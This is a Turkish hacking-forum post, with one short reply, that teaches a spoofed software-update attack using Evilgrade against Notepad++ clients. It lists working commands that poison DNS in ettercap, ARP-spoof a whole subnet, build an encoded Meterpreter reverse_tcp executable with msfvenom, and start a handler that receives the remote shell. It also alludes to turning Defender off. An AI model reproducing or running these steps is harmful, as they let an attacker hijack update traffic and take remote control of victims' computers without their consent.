Sp00f s0ftware update

xzh

Üye
8 Nis 2020
153
36

Sp00f s0ftware update​

Evilgrade is a modular exploit tool written by Francisco Amato designed to exploit weak software update methods.Evilgrade monitors the network as MitM, using a list of software targets (Evilgrade “modules”). When Evilgrade observes a request from a client to see if an update is available, it sends a spoofed response back to the client, indicating that an update is available while dropping the legitimate response from the server. In the spoofed response, Evilgrade indicates that the URL to download the software exists on the attacker’s system, pointing to a custom executable of the attacker’s choosing. { EVILGRADE }

Evilgrade comes with several preconfigured modules, supporting attacks against the Java Runtime Engine, WinZip, WinAmp, OpenOffice, iTunes, Notepad++, and more.
To use Evilgrade, we must trick the client into thinking that we are the software update server. This is typically done by manipulating DNS in conjunction with Ettercap or a preferred MitM attack tool. Next, we’ll look at this process step-by-step.

1. echo “notepad-plus.sourceforge.net A 192.168.48.133” >> /etc/ettercap/etter.dns


1. ettercap -TqM arp:remote /[B]192.168.48.1[/B]-254// /[B]192.168.48.1[/B]-254//[/B] 2. [B]ENTER : P
1*AbovHRoUE01D6DcDtPscQg.png


1*FE8o5W_tmmf8lOBv5qt3rw.png


Evilgrade includes its own web server that it uses to respond to software update checks and to deliver a malicious executable to the target. The default executable is included in Evilgrade’s agent/ directory called “agent.exe,” We can replace this file with any exploit of our choosing

cd isr-evilgrade/agent msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.48.133 LPORT=8080 -f exe — platform windows -e x86/shikata_ga_nai -a x86 > agent.exe msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LPORT 8080; set LHOST 192.168.48.133; exploit"

Now Evilgrade

./evilgrade
1*OiGGaX_mXZxA0OZDxy9IBA.png


F3ckDEF OFF!

Update Notepad

1*8oc_hdrYVzFh78fU9bzRlg.png



1*8J0c9lTvd5aNsqGr1akbbw.png
 

jogacan

Moderatör Asistanı
20 Mar 2022
200
92
thanks i don't remember exactly but there were other tools like this
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.